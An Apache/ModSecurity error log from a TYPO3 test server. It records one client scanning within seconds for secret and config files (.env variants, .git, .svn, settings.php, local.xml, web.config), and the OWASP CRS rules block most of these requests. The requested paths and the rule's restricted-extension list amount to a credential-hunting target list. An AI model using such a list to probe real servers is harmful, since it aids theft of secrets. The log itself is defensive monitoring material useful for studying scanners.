[Fri Mar 28 05:25:36.337017 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_QAAAAE"]
[Fri Mar 28 05:25:36.337245 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_QAAAAE"]
[Fri Mar 28 05:25:36.337427 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_QAAAAE"]
[Fri Mar 28 05:25:36.372363 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_gAAAAE"]
[Fri Mar 28 05:25:36.372585 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_gAAAAE"]
[Fri Mar 28 05:25:36.372745 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i_gAAAAE"]
[Fri Mar 28 05:25:36.407278 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:36.442606 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-YkwO6JzOzvChkXJd9jAAAAAAE"]
[Fri Mar 28 05:25:36.442843 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-YkwO6JzOzvChkXJd9jAAAAAAE"]
[Fri Mar 28 05:25:36.442996 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-YkwO6JzOzvChkXJd9jAAAAAAE"]
[Fri Mar 28 05:25:36.477437 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:36.512753 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:36.547501 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:36.582373 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Fri Mar 28 05:25:36.773705 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-YkwO6JzOzvChkXJd9jCAAAAAE"]
[Fri Mar 28 05:25:36.773957 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-YkwO6JzOzvChkXJd9jCAAAAAE"]
[Fri Mar 28 05:25:36.774136 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-YkwO6JzOzvChkXJd9jCAAAAAE"]
[Fri Mar 28 05:25:36.860600 2025] [php:error] [pid 2084672] [client 170.39.218.72:6348] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Fri Mar 28 05:25:36.999819 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Fri Mar 28 05:25:37.147938 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Fri Mar 28 05:25:37.545287 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGAAAAAE"]
[Fri Mar 28 05:25:37.545518 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGAAAAAE"]
[Fri Mar 28 05:25:37.545685 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGAAAAAE"]
[Fri Mar 28 05:25:37.632179 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Fri Mar 28 05:25:37.667449 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGwAAAAE"]
[Fri Mar 28 05:25:37.667686 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGwAAAAE"]
[Fri Mar 28 05:25:37.667884 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-Ykwe6JzOzvChkXJd9jGwAAAAE"]
[Fri Mar 28 05:25:38.045550 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-Ykwu6JzOzvChkXJd9jHwAAAAE"]
[Fri Mar 28 05:25:38.045782 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-Ykwu6JzOzvChkXJd9jHwAAAAE"]
[Fri Mar 28 05:25:38.045979 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-Ykwu6JzOzvChkXJd9jHwAAAAE"]
[Fri Mar 28 05:25:38.080648 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Fri Mar 28 05:25:38.323105 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJQAAAAE"]
[Fri Mar 28 05:25:38.323347 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJQAAAAE"]
[Fri Mar 28 05:25:38.323533 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJQAAAAE"]
[Fri Mar 28 05:25:38.358516 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJgAAAAE"]
[Fri Mar 28 05:25:38.358734 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJgAAAAE"]
[Fri Mar 28 05:25:38.358911 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJgAAAAE"]
[Fri Mar 28 05:25:38.393898 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJwAAAAE"]
[Fri Mar 28 05:25:38.394116 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJwAAAAE"]
[Fri Mar 28 05:25:38.394292 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-Ykwu6JzOzvChkXJd9jJwAAAAE"]
[Fri Mar 28 05:25:38.428887 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Fri Mar 28 05:25:38.463715 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Fri Mar 28 05:25:38.601515 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Mar 28 05:25:38.636789 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-Ykwu6JzOzvChkXJd9jLQAAAAE"]
[Fri Mar 28 05:25:38.636940 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-Ykwu6JzOzvChkXJd9jLQAAAAE"]
[Fri Mar 28 05:25:38.637168 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-Ykwu6JzOzvChkXJd9jLQAAAAE"]
[Fri Mar 28 05:25:38.637342 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-Ykwu6JzOzvChkXJd9jLQAAAAE"]
[Fri Mar 28 05:25:38.672007 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Fri Mar 28 05:25:38.872027 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/CHANGELOG.txt
[Fri Mar 28 05:25:38.908051 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-Ykwu6JzOzvChkXJd9jMwAAAAE"]
[Fri Mar 28 05:25:38.908366 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-Ykwu6JzOzvChkXJd9jMwAAAAE"]
